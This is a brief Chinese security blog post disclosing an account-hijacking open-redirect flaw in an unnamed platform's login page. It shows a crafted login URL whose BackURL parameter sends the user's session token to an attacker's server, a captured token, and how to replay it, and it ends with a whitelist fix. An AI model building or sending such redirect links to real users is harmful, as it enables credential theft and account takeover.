点击蓝字 · 关注我们
某信息化平台登录处存在账户劫持漏洞
URL跳转
高危
http://xx.xx.xx.xx:8809/Home/AdminPretty
0x01
http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:8809/Home/Admin
0x02
这里搭配自己的服务器,完成劫持过程:
首先变化下登录链接,将跳转后的地址换成自己的服务器地址:
http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:2333/
0x03
将上面链接发送给用户,只要用户正常登录,服务器这边就能收到用户的登录凭证:
/?Token=8B0D78A4D3087010D1AAFA060CD420C44C2D283E53A0B430016631DD6B2B4DE1317D9935FA9F602B,test01
然后加上原来的地址,直接可以登录系统.
-
用户点击上面发送的ip链接就可以导致账户被攻击者登录 -
利用任意的URL跳转的问题可以跳转到其他网站
限制登录后的URL跳转范围,定义白名单.
PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):某信息化平台登录处存在账户劫持漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论